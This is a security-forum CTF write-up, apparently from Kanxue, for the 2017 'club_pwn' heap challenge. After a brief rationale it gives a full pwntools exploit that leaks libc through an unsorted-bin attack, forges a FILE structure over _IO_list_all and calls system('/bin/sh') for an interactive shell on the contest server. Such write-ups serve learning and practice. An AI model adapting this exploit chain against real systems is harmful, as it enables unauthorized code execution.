首页
社区
课程
招聘
问答 CTF 排行榜 知识库 工具下载 峰会 看雪商城 证书查询
  1. 社区
  2. Pwn
    3. 发新帖
1
[原创]2017CTF秋季赛 第四题 club_pwn 解题报告
发表于: 2017-10-31 20:39 4483

[原创]2017CTF秋季赛 第四题 club_pwn 解题报告

kkHAIKE 活跃值
10
2017-10-31 20:39
4483

歉意

囧,对我来说太复杂了,东拼西凑居然搞出来了,大家还是看别人的解析吧,我就贴贴代码。

 

和 free 有关的

  • double free (get_box 只能每种大小各用一次,free_box 只能 free 2, 3号,不能用这个)
  • fastbin attack (每次申请的大小必须不一样,不能用这个)
  • unsorted bin attack (只能用这个了)

各种参考资料

调试工具

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
from pwn import *
 
context.arch = 'amd64'
context.terminal = '/bin/sh'
#p = process('./club')
#p = gdb.debug("./club")
p = remote("123.206.22.95", 8888)
 
def get_box(idx, sz):
    p.recvuntil("> ")
    p.send("1")
    p.recvuntil("> ")
    p.send(str(idx))
    p.recvuntil("> ")
    p.send(str(sz))
 
def del_box(idx):
    p.recvuntil("> ")
    p.send("2")
    p.recvuntil("> ")
    p.send(str(idx))
 
def set_box(idx, msg):
    p.recvuntil("> ")
    p.send("3")
    p.recvuntil("> ")
    p.send(str(idx))
    assert "\n" not in msg
    p.send(msg + "\n")
 
def show_box(idx):
    p.recvuntil("> ")
    p.send("4")
    p.recvuntil("> ")
    p.send(str(idx))
    return p.recvline(keepends=False)
 
get_box(3, 1024)
get_box(4, 2048)
del_box(3)
 
main_arena_88 = u64(show_box(3).ljust(8, "\0"))
libc_base = main_arena_88 - 0x3C4B78
IO_list_all = libc_base + 0x3C5520
psystem = libc_base + 0x45390
 
get_box(2, 480)
get_box(1, 464)
del_box(2)
 
part2 = u64(show_box(2).ljust(8, "\0"))
pbuf = part2 - 960
 
payload = "/bin/sh\x00" + p64(96) + p64(part2) + p64(pbuf-16) + p64(0) + p64(1)
payload = payload.ljust(0xc0, "\0")
payload += p64(2**64-1)
payload = payload.ljust(0xd8,'\x00')
payload += p64(pbuf + 480 + 0xd8 + 8) + p64(0) + p64(0)
payload += p64(1) + p64(psystem)
 
payload = payload.ljust(480, "\0")
 
set_box(3, p64(pbuf+480) + p64(IO_list_all-0x10) + p64(0) + p64(0) + "A"*448 + \
    payload + \
    p64(0) + p64(64) + p64(main_arena_88) + p64(pbuf+480) + p64(0) + p64(0))
 
get_box(5, 4000)
 
p.interactive()

PS

阿里云开了10几块


[注意]看雪招聘,专注安全领域的专业人才平台!

收藏
免费 1
支持
分享
赞赏记录
参与人
雪币
留言
时间
新手慢慢来
为你点赞~
2019-3-25 13:16
最新回复 (1)
风间仁
雪    币: 30067
活跃值: (8549)
能力值: ( LV15,RANK:3306 )
在线值:
发帖
回帖
粉丝
私信
2
nice,  等的就是这种不需要leak  process heap的解法
2017-11-5 09:49
0
游客
登录 | 注册 方可回帖
回帖 表情 雪币赚取及消费
高级回复
返回

账号登录
验证码登录

忘记密码?
没有账号?立即免费注册
我已同意 《看雪服务条款》 《看雪课程免责声明》 《看雪隐私政策》